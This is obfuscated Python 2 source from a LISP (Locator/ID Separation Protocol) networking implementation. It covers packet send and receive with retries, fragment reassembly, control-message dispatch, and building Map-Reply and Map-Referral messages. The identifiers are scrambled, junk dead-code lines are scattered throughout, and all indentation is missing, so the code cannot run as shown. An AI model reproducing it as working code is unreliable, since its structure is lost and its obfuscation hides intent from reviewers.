if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
o00o = 1500 if ( packet . find ( "control-packet" ) == - 1 ) else 9000
if 1 - 1: oO0o - ooOoO0o
i1 = 0
iI1 = len ( packet )
OooO0O0oo = 0
o00oO0oo = .001
while ( iI1 > 0 ) :
OoO00oO0oOoO0 = min ( iI1 , o00o )
o0OOOoOo0oO = packet [ i1 : OoO00oO0oOoO0 + i1 ]
if 80 - 80: OoOoOO00
try :
send_socket . sendto ( o0OOOoOo0oO , node )
lprint ( "Send IPC {}-out-of-{} byte to {} succeeded" . format ( len ( o0OOOoOo0oO ) , len ( packet ) , node ) )
if 31 - 31: OOooOOo * ooOoO0o + ooOoO0o / O0 - OOooOOo
OooO0O0oo = 0
o00oO0oo = .001
if 47 - 47: I1Ii111 . OoooooooOO - oO0o - o0oOOo0O0Ooo . I1ii11iIi11i / iIii1I11I1II1
except socket . error , o0OoO00 :
if ( OooO0O0oo == 12 ) :
lprint ( "Giving up on {}, consider it down" . format ( node ) )
break
if 20 - 20: i11iIiiIii / OoO0O00 * I1IiiI - I1IiiI * Ii1I
if 73 - 73: ooOoO0o % I1Ii111
lprint ( "Send IPC {}-out-of-{} byte to {} failed: {}" . format ( len ( o0OOOoOo0oO ) , len ( packet ) , node , o0OoO00 ) )
if 69 - 69: OoOoOO00 / OOooOOo / I1IiiI
if 12 - 12: I1ii11iIi11i . iIii1I11I1II1 . II111iiii . OoOoOO00
OooO0O0oo += 1
time . sleep ( o00oO0oo )
if 30 - 30: i11iIiiIii / Oo0Ooo / OOooOOo + i11iIiiIii * ooOoO0o
lprint ( "Retrying after {} ms ..." . format ( o00oO0oo * 1000 ) )
o00oO0oo *= 2
continue
if 4 - 4: O0 + I1IiiI + I1Ii111
if 80 - 80: Ii1I % OoooooooOO . i1IIi - OOooOOo
i1 += OoO00oO0oOoO0
iI1 -= OoO00oO0oOoO0
if 10 - 10: I11i + iII111i % OoO0O00 / OoO0O00
return
if 91 - 91: ooOoO0o . oO0o
if 66 - 66: II111iiii + OOooOOo + i11iIiiIii / II111iiii
if 37 - 37: I1IiiI + OoO0O00 . OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo
if 81 - 81: i1IIi % iIii1I11I1II1
if 41 - 41: oO0o - iII111i / o0oOOo0O0Ooo . iII111i % Oo0Ooo + OOooOOo
if 82 - 82: ooOoO0o
if 89 - 89: OOooOOo / I1ii11iIi11i . I1IiiI + i11iIiiIii
def lisp_format_packet ( packet ) :
packet = binascii . hexlify ( packet )
i1 = 0
i1iiI11ii1II1 = ""
iI1 = len ( packet ) * 2
while ( i1 < iI1 ) :
i1iiI11ii1II1 += packet [ i1 : i1 + 8 ] + " "
i1 += 8
iI1 -= 4
if 11 - 11: oO0o . i11iIiiIii * ooOoO0o % OoooooooOO % O0
return ( i1iiI11ii1II1 )
if 59 - 59: i11iIiiIii / OoO0O00
if 48 - 48: iIii1I11I1II1
if 19 - 19: oO0o
if 69 - 69: I1ii11iIi11i % iII111i - OoooooooOO % Ii1I * oO0o
if 12 - 12: OoOoOO00 / I1Ii111 . O0 . IiII - OOooOOo - OoO0O00
if 28 - 28: II111iiii . OoOoOO00 - o0oOOo0O0Ooo
if 89 - 89: I1Ii111 * OoooooooOO . OOooOOo . I11i % i11iIiiIii
def lisp_send ( lisp_sockets , dest , port , packet ) :
IIiiIII = lisp_sockets [ 0 ] if dest . is_ipv4 ( ) else lisp_sockets [ 1 ]
if 33 - 33: OoO0O00 / OoO0O00 * i11iIiiIii % iII111i + II111iiii
if 16 - 16: ooOoO0o * OoOoOO00 / OoOoOO00 + II111iiii
if 50 - 50: OoO0O00 / OOooOOo % I1IiiI / Ii1I + OoO0O00 . iIii1I11I1II1
if 62 - 62: I1Ii111 + OoooooooOO - Ii1I - iIii1I11I1II1
if 80 - 80: OoO0O00
if 72 - 72: II111iiii % i11iIiiIii + OoOoOO00 / I1Ii111 - i11iIiiIii
if 39 - 39: i11iIiiIii - OOooOOo / OoO0O00 * OoOoOO00 / IiII
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 / Ii1I / II111iiii
if 56 - 56: OOooOOo * iII111i / Ii1I
if 9 - 9: I1ii11iIi11i * i11iIiiIii / I1Ii111 + iIii1I11I1II1
if 1 - 1: OoO0O00 % iIii1I11I1II1 * OoOoOO00 / oO0o
if 73 - 73: iII111i
III1 = dest . print_address_no_iid ( )
if ( III1 . find ( "::ffff:" ) != - 1 and III1 . count ( "." ) == 3 ) :
if ( lisp_i_am_rtr ) : IIiiIII = lisp_sockets [ 0 ]
if ( IIiiIII == None ) :
IIiiIII = lisp_sockets [ 0 ]
III1 = III1 . split ( "::ffff:" ) [ - 1 ]
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo
if 45 - 45: oO0o % O0 / O0
if 98 - 98: I1Ii111
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Send" , False ) ,
len ( packet ) , bold ( "to " + III1 , False ) , port ,
lisp_format_packet ( packet ) ) )
if 58 - 58: OOooOOo
if 6 - 6: I1ii11iIi11i
if 37 - 37: i11iIiiIii . II111iiii + OOooOOo + i1IIi * OOooOOo
if 18 - 18: ooOoO0o
I11II1I = ( LISP_RLOC_PROBE_TTL == 255 )
if ( I11II1I ) :
oOo0O0OO0 = struct . unpack ( "B" , packet [ 0 ] ) [ 0 ]
I11II1I = ( oOo0O0OO0 in [ 0x12 , 0x28 ] )
if ( I11II1I ) : lisp_set_ttl ( IIiiIII , LISP_RLOC_PROBE_TTL )
if 62 - 62: OoooooooOO % OoO0O00 / Ii1I . II111iiii / I1Ii111
if 79 - 79: IiII . OoOoOO00 / oO0o % OoO0O00 / Ii1I + I11i
try : IIiiIII . sendto ( packet , ( III1 , port ) )
except socket . error , o0OoO00 :
lprint ( "socket.sendto() failed: {}" . format ( o0OoO00 ) )
if 78 - 78: o0oOOo0O0Ooo + I1Ii111 % i11iIiiIii % I1IiiI - Ii1I
if 81 - 81: i11iIiiIii - II111iiii + I11i
if 52 - 52: II111iiii
if 62 - 62: iII111i / OoO0O00 + i11iIiiIii / Oo0Ooo
if 26 - 26: I1ii11iIi11i - OoO0O00
if ( I11II1I ) : lisp_set_ttl ( IIiiIII , 64 )
return
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i + O0
if 12 - 12: I11i . OOooOOo + o0oOOo0O0Ooo . OoO0O00 + o0oOOo0O0Ooo
if 56 - 56: i1IIi / i1IIi . OoO0O00 % i1IIi - OoOoOO00 % OOooOOo
if 66 - 66: i11iIiiIii * IiII % IiII . I1IiiI / ooOoO0o
if 50 - 50: IiII . iII111i / o0oOOo0O0Ooo % OoOoOO00 * IiII % I11i
if 15 - 15: Ii1I
if 29 - 29: I11i / I1IiiI / OoooooooOO . OoOoOO00 / I11i . I1Ii111
if 69 - 69: O0 * OoOoOO00 + o0oOOo0O0Ooo + I1IiiI % iII111i . OoooooooOO
def lisp_receive_segments ( lisp_socket , packet , source , total_length ) :
if 45 - 45: I1Ii111 + oO0o - o0oOOo0O0Ooo - OoOoOO00 + I1IiiI / II111iiii
if 46 - 46: II111iiii . iIii1I11I1II1
if 62 - 62: I1ii11iIi11i % i1IIi % I1Ii111 * ooOoO0o % OOooOOo + I1IiiI
if 100 - 100: II111iiii - o0oOOo0O0Ooo * OoooooooOO . ooOoO0o / II111iiii / oO0o
if 43 - 43: iIii1I11I1II1 + ooOoO0o * iII111i + iIii1I11I1II1 . I1Ii111
OoO00oO0oOoO0 = total_length - len ( packet )
if ( OoO00oO0oOoO0 == 0 ) : return ( [ True , packet ] )
if 87 - 87: I1Ii111
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( packet ) ,
total_length , source ) )
if 47 - 47: II111iiii + I1IiiI . Oo0Ooo / iIii1I11I1II1
if 14 - 14: i1IIi / OoO0O00 / iII111i % I1Ii111
if 72 - 72: OoO0O00 . II111iiii - IiII + IiII + iIii1I11I1II1 % oO0o
if 21 - 21: iII111i + OoOoOO00 - i11iIiiIii % O0 + OOooOOo
if 30 - 30: o0oOOo0O0Ooo - Oo0Ooo + iII111i / O0
iI1 = OoO00oO0oOoO0
while ( iI1 > 0 ) :
try : o0OOOoOo0oO = lisp_socket . recvfrom ( 9000 )
except : return ( [ False , None ] )
if 94 - 94: IiII
o0OOOoOo0oO = o0OOOoOo0oO [ 0 ]
if 69 - 69: I1Ii111 . I1Ii111
if 53 - 53: i11iIiiIii + iII111i * Oo0Ooo - I1Ii111
if 61 - 61: o0oOOo0O0Ooo / OOooOOo . II111iiii - I1IiiI * i11iIiiIii
if 8 - 8: iII111i % o0oOOo0O0Ooo
if 87 - 87: Ii1I % I11i / I1Ii111
if ( o0OOOoOo0oO . find ( "packet@" ) == 0 ) :
iIi111 = o0OOOoOo0oO . split ( "@" )
lprint ( "Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded" , len ( o0OOOoOo0oO ) ,
# I1Ii111 . Ii1I % iIii1I11I1II1 / OoOoOO00
iIi111 [ 1 ] if len ( iIi111 ) > 2 else "?" )
return ( [ False , o0OOOoOo0oO ] )
if 38 - 38: i1IIi
if 1 - 1: I1ii11iIi11i + OoO0O00 % I11i . OOooOOo + i1IIi / oO0o
iI1 -= len ( o0OOOoOo0oO )
packet += o0OOOoOo0oO
if 35 - 35: ooOoO0o % OoOoOO00 % OoO0O00 + OOooOOo / IiII * OoOoOO00
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( o0OOOoOo0oO ) , total_length , source ) )
if 65 - 65: I1IiiI . Oo0Ooo + i1IIi - Ii1I * i1IIi
if 64 - 64: I1IiiI / OoO0O00 * I1IiiI * II111iiii . Ii1I
return ( [ True , packet ] )
if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
if 2 - 2: OOooOOo / I11i * I11i + I11i / O0 - OOooOOo
if 29 - 29: OoOoOO00 + i11iIiiIii % OoO0O00 - OoooooooOO
if 68 - 68: iII111i / OOooOOo
if 28 - 28: II111iiii
if 49 - 49: I1ii11iIi11i
def lisp_bit_stuff ( payload ) :
lprint ( "Bit-stuffing, found {} segments" . format ( len ( payload ) ) )
ii1i1II = ""
for o0OOOoOo0oO in payload : ii1i1II += o0OOOoOo0oO + "\x40"
return ( ii1i1II [ : - 1 ] )
if 33 - 33: iIii1I11I1II1
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if 12 - 12: OoooooooOO
def lisp_receive ( lisp_socket , internal ) :
while ( True ) :
if 9 - 9: O0 / O0 / I1IiiI - oO0o . ooOoO0o
if 6 - 6: O0 - OoO0O00 + OoooooooOO % iIii1I11I1II1
if 58 - 58: i11iIiiIii * OOooOOo . Oo0Ooo / iII111i - i1IIi
if 45 - 45: Ii1I
try : O0000oO = lisp_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
if 2 - 2: I1Ii111 % iIii1I11I1II1 . Ii1I - II111iiii
if 33 - 33: I11i . i11iIiiIii % i1IIi * II111iiii * i11iIiiIii + OoOoOO00
if 26 - 26: I1IiiI % OoOoOO00 % I11i + Oo0Ooo
if 86 - 86: iII111i / i1IIi % Oo0Ooo
if 84 - 84: o0oOOo0O0Ooo * OOooOOo . I11i * Ii1I
if 32 - 32: ooOoO0o % ooOoO0o * I1ii11iIi11i % Ii1I + Oo0Ooo . OoOoOO00
if ( internal == False ) :
ii1i1II = O0000oO [ 0 ]
O0O00Oo = lisp_convert_6to4 ( O0000oO [ 1 ] [ 0 ] )
IIi1I1iII111 = O0000oO [ 1 ] [ 1 ]
if 2 - 2: I1Ii111 / ooOoO0o * oO0o + IiII
if ( IIi1I1iII111 == LISP_DATA_PORT ) :
IIii = lisp_data_plane_logging
Oo = lisp_format_packet ( ii1i1II [ 0 : 60 ] ) + " ..."
else :
IIii = True
Oo = lisp_format_packet ( ii1i1II )
if 50 - 50: i11iIiiIii / i1IIi + i1IIi / Ii1I . o0oOOo0O0Ooo + OoOoOO00
if 29 - 29: I1ii11iIi11i % OOooOOo - I1IiiI / iII111i % OoOoOO00
if ( IIii ) :
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Receive" ,
False ) , len ( ii1i1II ) , bold ( "from " + O0O00Oo , False ) , IIi1I1iII111 ,
Oo ) )
if 15 - 15: o0oOOo0O0Ooo / OOooOOo % I1IiiI - I1IiiI / i1IIi * Ii1I
return ( [ "packet" , O0O00Oo , IIi1I1iII111 , ii1i1II ] )
if 90 - 90: ooOoO0o % o0oOOo0O0Ooo * Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo * OoOoOO00
if 40 - 40: iIii1I11I1II1 - i11iIiiIii / i1IIi / II111iiii
if 37 - 37: Ii1I + o0oOOo0O0Ooo
if 74 - 74: Oo0Ooo / O0 + i1IIi . I1IiiI + OoO0O00 / Oo0Ooo
if 13 - 13: o0oOOo0O0Ooo / Ii1I . II111iiii
if 8 - 8: I11i - I11i % IiII
Ii1 = False
Ii11i1IiII = O0000oO [ 0 ]
OOIi = False
if 34 - 34: Oo0Ooo + I11i / i1IIi - o0oOOo0O0Ooo
while ( Ii1 == False ) :
Ii11i1IiII = Ii11i1IiII . split ( "@" )
if 26 - 26: iII111i % OoOoOO00 / iII111i * IiII / oO0o % I1IiiI
if ( len ( Ii11i1IiII ) < 4 ) :
lprint ( "Possible fragment (length {}), from old message, " + "discarding" , len ( Ii11i1IiII [ 0 ] ) )
if 100 - 100: OoO0O00 + i11iIiiIii + IiII * ooOoO0o . iIii1I11I1II1 - OoOoOO00
OOIi = True
break
if 15 - 15: Ii1I - OoOoOO00
if 27 - 27: O0
O0o0oO0 = Ii11i1IiII [ 0 ]
try :
IIi1ii1II1II = int ( Ii11i1IiII [ 1 ] )
except :
ii11iiIii1 = bold ( "Internal packet reassembly error" , False )
lprint ( "{}: {}" . format ( ii11iiIii1 , O0000oO ) )
OOIi = True
break
if 97 - 97: OOooOOo . OoOoOO00 / I11i - IiII - iIii1I11I1II1
O0O00Oo = Ii11i1IiII [ 2 ]
IIi1I1iII111 = Ii11i1IiII [ 3 ]
if 82 - 82: II111iiii + OoO0O00 % iIii1I11I1II1 / O0
if 75 - 75: OOooOOo * OoO0O00 + OoooooooOO + i11iIiiIii . OoO0O00
if 94 - 94: I11i * ooOoO0o . I1IiiI / Ii1I - I1IiiI % OoooooooOO
if 32 - 32: OoO0O00
if 22 - 22: II111iiii . I11i
if 61 - 61: OOooOOo % O0 . I1ii11iIi11i . iIii1I11I1II1 * I11i
if 29 - 29: ooOoO0o + i1IIi % IiII * Ii1I
if 94 - 94: OOooOOo / IiII
if ( len ( Ii11i1IiII ) > 5 ) :
ii1i1II = lisp_bit_stuff ( Ii11i1IiII [ 4 : : ] )
else :
ii1i1II = Ii11i1IiII [ 4 ]
if 18 - 18: IiII - I11i / Ii1I % IiII * i1IIi
if 22 - 22: OoOoOO00 - Oo0Ooo
if 41 - 41: iIii1I11I1II1 * I1Ii111 / OoO0O00
if 33 - 33: I11i + O0
if 9 - 9: I11i . iII111i * ooOoO0o * ooOoO0o
if 68 - 68: O0 - i11iIiiIii % iIii1I11I1II1 % ooOoO0o
Ii1 , ii1i1II = lisp_receive_segments ( lisp_socket , ii1i1II ,
O0O00Oo , IIi1ii1II1II )
if ( ii1i1II == None ) : return ( [ "" , "" , "" , "" ] )
if 12 - 12: II111iiii + I11i
if 9 - 9: I1ii11iIi11i
if 51 - 51: I1ii11iIi11i
if 37 - 37: I1IiiI % I1Ii111
if 22 - 22: o0oOOo0O0Ooo % OOooOOo - I11i + ooOoO0o / OOooOOo
if ( Ii1 == False ) :
Ii11i1IiII = ii1i1II
continue
if 98 - 98: I11i * O0 + IiII - oO0o
if 35 - 35: OoooooooOO * Ii1I
if ( IIi1I1iII111 == "" ) : IIi1I1iII111 = "no-port"
if ( O0o0oO0 == "command" and lisp_i_am_core == False ) :
OO000o00 = ii1i1II . find ( " {" )
O0oOOOOoOO = ii1i1II if OO000o00 == - 1 else ii1i1II [ : OO000o00 ]
O0oOOOOoOO = ": '" + O0oOOOOoOO + "'"
else :
O0oOOOOoOO = ""
if 72 - 72: iII111i * oO0o
if 37 - 37: I1IiiI
lprint ( "{} {} bytes {} {}, {}{}" . format ( bold ( "Receive" , False ) ,
len ( ii1i1II ) , bold ( "from " + O0O00Oo , False ) , IIi1I1iII111 , O0o0oO0 ,
O0oOOOOoOO if ( O0o0oO0 in [ "command" , "api" ] ) else ": ... " if ( O0o0oO0 == "data-packet" ) else ": " + lisp_format_packet ( ii1i1II ) ) )
if 76 - 76: iIii1I11I1II1 . iII111i % ooOoO0o / iII111i + I11i
if 85 - 85: i11iIiiIii
if 25 - 25: oO0o . OoO0O00 % Ii1I % Ii1I
if 94 - 94: iII111i . Ii1I
if 71 - 71: o0oOOo0O0Ooo * II111iiii / OOooOOo . OoO0O00
if ( OOIi ) : continue
return ( [ O0o0oO0 , O0O00Oo , IIi1I1iII111 , ii1i1II ] )
if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
if 100 - 100: Oo0Ooo + IiII
if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
if 23 - 23: I1Ii111
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
def lisp_parse_packet ( lisp_sockets , packet , source , udp_sport , ttl = - 1 ) :
o00O0O0oOo0 = False
if 13 - 13: OoO0O00 + Ii1I % iIii1I11I1II1 / Ii1I
iIIIIII = lisp_control_header ( )
if ( iIIIIII . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return ( o00O0O0oOo0 )
if 86 - 86: OoooooooOO % Ii1I
if 21 - 21: iII111i
if 72 - 72: I11i % o0oOOo0O0Ooo . iIii1I11I1II1 - I1Ii111 / i11iIiiIii
if 75 - 75: OoooooooOO
if 24 - 24: oO0o % iII111i - II111iiii / Ii1I + O0
i1iiiI1I = source
if ( source . find ( "lisp" ) == - 1 ) :
o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o0 . string_to_afi ( source )
o0 . store_address ( source )
source = o0
if 76 - 76: I1Ii111 . Oo0Ooo - ooOoO0o . II111iiii - iII111i
if 36 - 36: iIii1I11I1II1 % Oo0Ooo
if ( iIIIIII . type == LISP_MAP_REQUEST ) :
lisp_process_map_request ( lisp_sockets , packet , None , 0 , source ,
udp_sport , False , ttl )
if 67 - 67: oO0o / II111iiii . I11i / oO0o
elif ( iIIIIII . type == LISP_MAP_REPLY ) :
lisp_process_map_reply ( lisp_sockets , packet , source , ttl )
if 46 - 46: oO0o * Oo0Ooo - I11i / iIii1I11I1II1
elif ( iIIIIII . type == LISP_MAP_REGISTER ) :
lisp_process_map_register ( lisp_sockets , packet , source , udp_sport )
if 100 - 100: i11iIiiIii % oO0o
elif ( iIIIIII . type == LISP_MAP_NOTIFY ) :
if ( i1iiiI1I == "lisp-etr" ) :
lisp_process_multicast_map_notify ( packet , source )
else :
if ( lisp_is_running ( "lisp-rtr" ) ) :
lisp_process_multicast_map_notify ( packet , source )
if 62 - 62: OOooOOo * i1IIi - OOooOOo / i11iIiiIii
lisp_process_map_notify ( lisp_sockets , packet , source )
if 17 - 17: I1ii11iIi11i + ooOoO0o % Ii1I % OOooOOo
if 73 - 73: i11iIiiIii
elif ( iIIIIII . type == LISP_MAP_NOTIFY_ACK ) :
lisp_process_map_notify_ack ( packet , source )
if 44 - 44: o0oOOo0O0Ooo % Ii1I - OoOoOO00 + OoOoOO00 * IiII + iII111i
elif ( iIIIIII . type == LISP_MAP_REFERRAL ) :
lisp_process_map_referral ( lisp_sockets , packet , source )
if 58 - 58: I1ii11iIi11i / oO0o + i11iIiiIii * o0oOOo0O0Ooo
elif ( iIIIIII . type == LISP_NAT_INFO and iIIIIII . is_info_reply ( ) ) :
OoOO0OOOO0 , oOoOoO0Oo0oo , o00O0O0oOo0 = lisp_process_info_reply ( source , packet , True )
if 19 - 19: OoOoOO00
elif ( iIIIIII . type == LISP_NAT_INFO and iIIIIII . is_info_reply ( ) == False ) :
oOo0O = source . print_address_no_iid ( )
lisp_process_info_request ( lisp_sockets , packet , oOo0O , udp_sport ,
None )
if 17 - 17: Oo0Ooo
elif ( iIIIIII . type == LISP_ECM ) :
lisp_process_ecm ( lisp_sockets , packet , source , udp_sport )
if 76 - 76: II111iiii % I1ii11iIi11i
else :
lprint ( "Invalid LISP control packet type {}" . format ( iIIIIII . type ) )
if 99 - 99: oO0o - I1Ii111
return ( o00O0O0oOo0 )
if 29 - 29: I1IiiI - I11i
if 42 - 42: Oo0Ooo - O0 . OoOoOO00
if 4 - 4: IiII
if 2 - 2: iII111i
if 47 - 47: i1IIi % I11i
if 17 - 17: OoOoOO00 - iII111i % I11i / o0oOOo0O0Ooo / II111iiii
if 22 - 22: Oo0Ooo + I1ii11iIi11i % i11iIiiIii . OoO0O00 - I11i % I11i
def lisp_process_rloc_probe_request ( lisp_sockets , map_request , source , port ,
ttl ) :
if 21 - 21: I1IiiI . OoO0O00 * IiII % OoooooooOO - Oo0Ooo + Oo0Ooo
iIiiI11II11 = bold ( "RLOC-probe" , False )
if 94 - 94: ooOoO0o
if ( lisp_i_am_etr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( iIiiI11II11 ) )
lisp_etr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl )
return
if 80 - 80: i11iIiiIii - O0 / I1Ii111 + OOooOOo % Oo0Ooo
if 95 - 95: II111iiii
if ( lisp_i_am_rtr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( iIiiI11II11 ) )
lisp_rtr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl )
return
if 76 - 76: OoO0O00 % iII111i * OoOoOO00 / ooOoO0o / i1IIi
if 45 - 45: Ii1I . I11i * I1Ii111 . i11iIiiIii
lprint ( "Ignoring received {} Map-Request, not an ETR or RTR" . format ( iIiiI11II11 ) )
return
if 34 - 34: O0 * o0oOOo0O0Ooo / IiII
if 75 - 75: I1Ii111 - i1IIi - OoO0O00
if 25 - 25: iII111i . o0oOOo0O0Ooo
if 62 - 62: I11i + i1IIi . I1ii11iIi11i - I1ii11iIi11i
if 68 - 68: ooOoO0o % OoooooooOO
def lisp_process_smr ( map_request ) :
lprint ( "Received SMR-based Map-Request" )
return
if 94 - 94: Oo0Ooo * o0oOOo0O0Ooo
if 60 - 60: iII111i . OOooOOo
if 39 - 39: O0 - i11iIiiIii - I1IiiI / Oo0Ooo - i11iIiiIii
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
def lisp_process_smr_invoked_request ( map_request ) :
lprint ( "Received SMR-invoked Map-Request" )
return
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
if 23 - 23: o0oOOo0O0Ooo . I11i
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
def lisp_build_map_reply ( eid , group , rloc_set , nonce , action , ttl , rloc_probe ,
keys , enc , auth , mr_ttl = - 1 ) :
iIiiIIiI1I = lisp_map_reply ( )
iIiiIIiI1I . rloc_probe = rloc_probe
iIiiIIiI1I . echo_nonce_capable = enc
iIiiIIiI1I . hop_count = 0 if ( mr_ttl == - 1 ) else mr_ttl
iIiiIIiI1I . record_count = 1
iIiiIIiI1I . nonce = nonce
ii1i1II = iIiiIIiI1I . encode ( )
iIiiIIiI1I . print_map_reply ( )
if 88 - 88: OOooOOo - I1ii11iIi11i % iII111i
OOoo = lisp_eid_record ( )
OOoo . rloc_count = len ( rloc_set )
OOoo . authoritative = auth
OOoo . record_ttl = ttl
OOoo . action = action
OOoo . eid = eid
OOoo . group = group
if 32 - 32: i1IIi - iII111i . I1ii11iIi11i * Ii1I % Oo0Ooo * OoOoOO00
ii1i1II += OOoo . encode ( )
OOoo . print_record ( " " , False )
if 92 - 92: OoO0O00
Ii1i = lisp_get_all_addresses ( ) + lisp_get_all_translated_rlocs ( )
if 36 - 36: IiII . iII111i * O0 . i1IIi * O0 * I1Ii111
for IiIIIi in rloc_set :
O0000O00O00OO = lisp_rloc_record ( )
oOo0O = IiIIIi . rloc . print_address_no_iid ( )
if ( oOo0O in Ii1i ) :
O0000O00O00OO . local_bit = True
O0000O00O00OO . probe_bit = rloc_probe
O0000O00O00OO . keys = keys
if ( IiIIIi . priority == 254 and lisp_i_am_rtr ) :
O0000O00O00OO . rloc_name = "RTR"
if 10 - 10: I1ii11iIi11i
if 5 - 5: IiII - iIii1I11I1II1 % oO0o % i1IIi
O0000O00O00OO . store_rloc_entry ( IiIIIi )
O0000O00O00OO . reach_bit = True
O0000O00O00OO . print_record ( " " )
ii1i1II += O0000O00O00OO . encode ( )
if 68 - 68: OoooooooOO * Oo0Ooo / o0oOOo0O0Ooo * I11i + OoO0O00 . OoooooooOO
return ( ii1i1II )
if 12 - 12: oO0o - I1ii11iIi11i
if 69 - 69: iII111i * IiII * oO0o % OoO0O00 - o0oOOo0O0Ooo
if 97 - 97: O0 + i11iIiiIii . i1IIi
if 43 - 43: II111iiii + OOooOOo . i11iIiiIii - II111iiii
if 80 - 80: o0oOOo0O0Ooo . oO0o . I1Ii111
if 26 - 26: i1IIi - I1IiiI + IiII / OoO0O00 . I1ii11iIi11i
if 82 - 82: I1Ii111 % iII111i . OoOoOO00 % OoO0O00 + I1ii11iIi11i
def lisp_build_map_referral ( eid , group , ddt_entry , action , ttl , nonce ) :
OOOOo0ooOoOO = lisp_map_referral ( )
OOOOo0ooOoOO . record_count = 1
OOOOo0ooOoOO . nonce = nonce
ii1i1II = OOOOo0ooOoOO . encode ( )
OOOOo0ooOoOO . print_map_referral ( )
if 86 - 86: OoooooooOO * OOooOOo * II111iiii - OoO0O00
OOoo = lisp_eid_record ( )
if 40 - 40: oO0o
i1ii1I = 0
if ( ddt_entry == None ) :
OOoo . eid = eid
OOoo . group = group
else :
i1ii1I = len ( ddt_entry . delegation_set )
OOoo . eid = ddt_entry . eid
OOoo . group = ddt_entry . group
ddt_entry . map_referrals_sent += 1
if 47 - 47: IiII % I1IiiI
OOoo . rloc_count = i1ii1I
OOoo . authoritative = True
if 91 - 91: Ii1I
if 69 - 69: iII111i
if 96 - 96: Ii1I
if 39 - 39: OoO0O00 - I1IiiI % II111iiii - IiII * I1ii11iIi11i
if 64 - 64: OOooOOo + Oo0Ooo . OoOoOO00 . OOooOOo + i11iIiiIii
iiiiIIiiII1Iii1 = False
if ( action == LISP_DDT_ACTION_NULL ) :
if ( i1ii1I == 0 ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
else :
I11i1ii11 = ddt_entry . delegation_set [ 0 ]
if ( I11i1ii11 . is_ddt_child ( ) ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
if 7 - 7: ooOoO0o * I11i / iIii1I11I1II1
if ( I11i1ii11 . is_ms_child ( ) ) :
action = LISP_DDT_ACTION_MS_REFERRAL
if 15 - 15: OoooooooOO / iII111i
if 40 - 40: o0oOOo0O0Ooo
if 75 - 75: oO0o - OoOoOO00 * ooOoO0o . O0
if 78 - 78: Oo0Ooo
if 74 - 74: O0 / I11i
if 52 - 52: I1IiiI + oO0o * II111iiii
if 15 - 15: I11i
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : iiiiIIiiII1Iii1 = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
iiiiIIiiII1Iii1 = ( lisp_i_am_ms and I11i1ii11 . is_ms_peer ( ) == False )
if 72 - 72: O0
if 15 - 15: II111iiii / I11i % II111iiii % Ii1I % i11iIiiIii / I1Ii111
OOoo . action = action
OOoo . ddt_incomplete = iiiiIIiiII1Iii1
OOoo . record_ttl = ttl
if 93 - 93: OOooOOo / OoooooooOO % iII111i
